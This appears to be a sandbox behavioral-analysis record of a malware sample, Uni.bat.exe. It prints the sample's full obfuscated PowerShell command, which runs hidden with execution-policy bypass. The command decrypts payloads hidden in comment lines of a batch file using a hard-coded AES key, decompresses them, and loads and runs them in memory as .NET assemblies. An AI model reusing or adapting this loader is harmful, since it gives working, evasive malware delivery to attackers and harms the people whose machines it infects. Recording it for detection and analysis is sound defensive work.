Behavioral Analysis

Uni.bat.exe "Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function BgRxE($XUBfu){ $yHyZa=[System.Security.Cryptography.Aes]::Create(); $yHyZa.Mode=[System.Security.Cryptography.CipherMode]::CBC; $yHyZa.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $yHyZa.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7MymoDIuie4tPVsKnVHec+BUrxddCyMvAJR/EwsbVTs='); $yHyZa.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6Jj5qajjJfogZ5gJA2HV7Q=='); $Urbyf=$yHyZa.CreateDecryptor(); $return_var=$Urbyf.TransformFinalBlock($XUBfu, 0, $XUBfu.Length); $Urbyf.Dispose(); $yHyZa.Dispose(); $return_var;}function mliMM($XUBfu){ $vcQqJ=New-Object System.IO.MemoryStream(,$XUBfu); $OYxgY=New-Object System.IO.MemoryStream; $Pmwqm=New-Object System.IO.Compression.GZipStream($vcQqJ, [IO.Compression.CompressionMode]::Decompress); $Pmwqm.CopyTo($OYxgY); $Pmwqm.Dispose(); $vcQqJ.Dispose(); $OYxgY.Dispose(); $OYxgY.ToArray();}function WbAdc($XUBfu,$ghXXD){ $oXpAu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$XUBfu); $chWYo=$oXpAu.EntryPoint; $chWYo.Invoke($null, $ghXXD);}$EsBfp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\test22\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($yNUfS in $EsBfp) { if ($yNUfS.StartsWith(':: ')) { $xivcY=$yNUfS.Substring(3); break; }}$ofSbM=[string[]]$xivcY.Split('\');$UxsLS=mliMM (BgRxE ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ofSbM[0])));$IoyMQ=mliMM (BgRxE ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ofSbM[1])));WbAdc $IoyMQ (,[string[]] (''));WbAdc $UxsLS (,[string[]] (''));